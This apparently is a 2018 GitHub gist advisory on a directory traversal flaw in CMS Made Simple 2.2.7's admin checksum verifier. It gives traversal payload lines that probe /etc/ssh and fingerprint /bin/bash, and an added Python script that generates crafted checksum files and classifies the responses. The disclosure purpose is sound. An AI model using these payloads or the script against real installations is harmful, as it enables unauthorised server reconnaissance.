Created
April 9, 2018 20:13
Gist: 0xn1k5/ef4c7c7a26c7d8a803ef3a85f1000c98
It is possible to brute-force and fingerprint known files and directories through the CMS Made Simple web application
Issue Description:
CMS Made Simple has a feature that lets the admin user download a checksum file, which can later be uploaded again to verify the integrity of the installation's files after a suspected compromise. It was observed that an admin user can upload a crafted checksum file whose paths contain directory traversal sequences; the verifier then resolves those paths outside the web root, and its result reveals whether the referenced files and directories exist.
Issue verified on version: CMS Made Simple 2.2.7 (latest at the time of writing); earlier versions may also be affected
Download Link: http://s3.amazonaws.com/cmsms/downloads/14144/cmsms-2.2.7-install.zip
Vendor Site: https://www.cmsmadesimple.org/about/cms-made-simple/
Risk:
An authenticated admin user can map the server's filesystem and confirm which applications are installed by probing for known files and directories.
On default installations it is also possible to fingerprint known binaries: the expected checksum for a candidate build can be computed offline and submitted, and a match identifies the application/binary version.
Steps to reproduce the issue:
1) Log in to the admin dashboard and navigate to "Site Admin" > "System Verification" > "Perform Validation", or open the URL below directly (the __c parameter is tied to the admin session, so use the value from your own session):
http://target/path/admin/checksum.php?__c=fde83629cd9b67f8911
2) Download the checksum file, then upload a modified copy containing one of the entries below. Each line has the form <md5>--::--<path>. For existence probes the checksum value on the left does not matter: a path that exists but does not match the checksum is reported differently from a path that is not found.
Case 1: If the directory exists - Output: "All Checksum match"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh
Case 2: If the directory doesn't exist - Output: "1 File not found"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh2
Case 3: If the file exists - Output: "1 Files failed md5sum check"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config
Case 4: If the file doesn't exist - Output: "1 File not found"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config_no_file
3) The checksum value on the left side is computed with the formula below (the relevant lines from the application). On default installations the md5 of /lib/version.php and index.php for the target version can be obtained from a local test install of the same version; combined with the md5 of a known binary build, this gives exactly the checksum the verifier expects, so a "match" confirms that the probed binary is that build.
Code Snippet:
```php
// Salt: the hex md5 digests of two files that are identical on every
// default installation of a given CMS Made Simple version, concatenated.
$salt = md5_file($config['root_path']."/lib/version.php").md5_file($config['root_path']."/index.php");
// ...
// Per-entry checksum: md5 of the salt followed by the hex md5 of the file.
$md5 = md5($salt.md5_file($fn));
```
Case: Verifying the checksum of /bin/bash - Output: "All checksums match those in the uploaded file"
71fdfce0a76d11f6db3e3ac730bf223a--::--/modules/Search/templates/../../../../../../../bin/bash
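The following script is an added example, not the gist author's code and not part of CMS Made Simple. It builds a crafted checksum file for the procedure above from the quoted salt formula, and classifies the verifier's summary message. The line format, the traversal prefix and the three messages matched are taken from the advisory; the function names, the stand-in file contents and the assumption that the verifier's messages always contain the substrings "not found", "failed md5sum" or "match" are mine.

```python
"""
Added example (not from the advisory or from CMS Made Simple): craft a
"System Verification" checksum file that probes paths via directory
traversal, and interpret the verifier's answers. The helper names and the
sample inputs below are assumptions for illustration.
"""
import hashlib

# Prefix used in the advisory's probe lines; the "../" chain after it must
# be long enough to climb from the install root to "/".
TRAVERSAL_PREFIX = "/modules/Search/templates/"
SEPARATOR = "--::--"          # separates <md5> from <path> in each line
DUMMY_MD5 = "0" * 32          # placeholder for pure existence probes


def md5_hex(data: bytes) -> str:
    """Same value PHP's md5_file() returns for a file with these contents."""
    return hashlib.md5(data).hexdigest()


def make_salt(version_php: bytes, index_php: bytes) -> str:
    """$salt = md5_file(root.'/lib/version.php') . md5_file(root.'/index.php')
    Two hex digests concatenated, i.e. a 64-character string. Take both
    files from a local install of the same CMS Made Simple version."""
    return md5_hex(version_php) + md5_hex(index_php)


def entry_checksum(salt: str, target_md5: str) -> str:
    """$md5 = md5($salt . md5_file($fn)), for a target whose md5 is target_md5."""
    return hashlib.md5((salt + target_md5).encode("ascii")).hexdigest()


def traversal_path(target: str, depth: int) -> str:
    """Path as written in the checksum file: prefix, 'depth' parent steps,
    then the absolute target path with its leading slash removed."""
    return TRAVERSAL_PREFIX + "../" * depth + target.lstrip("/")


def probe_line(salt: str, target: str, depth: int, target_md5: str = DUMMY_MD5) -> str:
    """One checksum-file line. For an existence probe any checksum works
    (a present file 'fails md5sum check', an absent one is 'not found');
    for fingerprinting pass the md5 of the suspected binary build."""
    return entry_checksum(salt, target_md5) + SEPARATOR + traversal_path(target, depth)


def build_checksum_file(salt: str, probes: list, depth: int) -> str:
    """probes: list of (absolute_target_path, expected_md5_or_None)."""
    lines = [probe_line(salt, path, depth, md5 or DUMMY_MD5) for path, md5 in probes]
    return "\n".join(lines) + "\n"


def classify(response: str) -> str:
    """Map the verifier's summary message to what it leaks about the path.
    Messages quoted in the advisory: 'N File not found',
    'N Files failed md5sum check', 'All checksums match ...'.
    Assumption: the messages keep those substrings."""
    text = response.lower()
    if "not found" in text:
        return "absent"
    if "failed md5sum" in text:
        return "present"          # exists; contents differ from the guess
    if "match" in text:
        return "present_match"    # exists; contents equal the guess
    return "unknown"


if __name__ == "__main__":
    # Constructed stand-ins: the bytes of /lib/version.php and index.php
    # from a local install, and the md5 of a locally installed /bin/bash.
    salt = make_salt(b"<?php $CMS_VERSION = '2.2.7';", b"<?php include 'lib/version.php';")
    local_bash_md5 = md5_hex(b"stand-in for the bytes of /bin/bash")
    probes = [
        ("/etc/ssh", None),              # does the directory exist?
        ("/etc/ssh/ssh_config", None),   # does the file exist?
        ("/bin/bash", local_bash_md5),   # is it the same build as mine?
    ]
    print(build_checksum_file(salt, probes, depth=15), end="")
    for msg in ("1 File not found", "1 Files failed md5sum check",
                "All checksums match those in the uploaded file"):
        print(f"{msg!r} -> {classify(msg)}")
```

Upload the generated file through "Perform Validation" and feed the summary line to classify(). Only the fingerprinting entries need the real salt; if you only want to know whether paths exist, the salt and the per-entry checksum can be anything, because the verifier distinguishes "not found" from a checksum mismatch. Note that the advisory reports an existing directory as a "match", so both non-"not found" outcomes mean the path is present.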
Probing a valid file
![directory-structure-mapping-01-valid-file](https://user-images.githubusercontent.com/934150/38520527-ae55f728-3c60-11e8-86ef-e63fb6e7b1fd.PNG)
Probing an invalid file
![directory-structure-mapping-01-invalid-file](https://user-images.githubusercontent.com/934150/38520531-afcb284e-3c60-11e8-93b5-5780ce793c87.PNG)
Probing a valid directory name
![directory-structure-mapping-01-valid-directory](https://user-images.githubusercontent.com/934150/38520532-b0020c38-3c60-11e8-8bd1-448fdfc0d8f3.PNG)
Probing an invalid directory name
![directory-structure-mapping-01-invalid-directory](https://user-images.githubusercontent.com/934150/38520530-af94f6ac-3c60-11e8-8735-cc578494e21f.PNG)
Calculating md5 hash for known binary
![fingerprinting-known-binary-02](https://user-images.githubusercontent.com/934150/38520529-af64ce6e-3c60-11e8-8fc5-c80de2872e4f.PNG)
Verifying/fingerprinting the known binary using md5 checksum calculated above
![fingerprinting-known-binary-01](https://user-images.githubusercontent.com/934150/38520528-ae974b60-3c60-11e8-832e-462ef164df7f.PNG)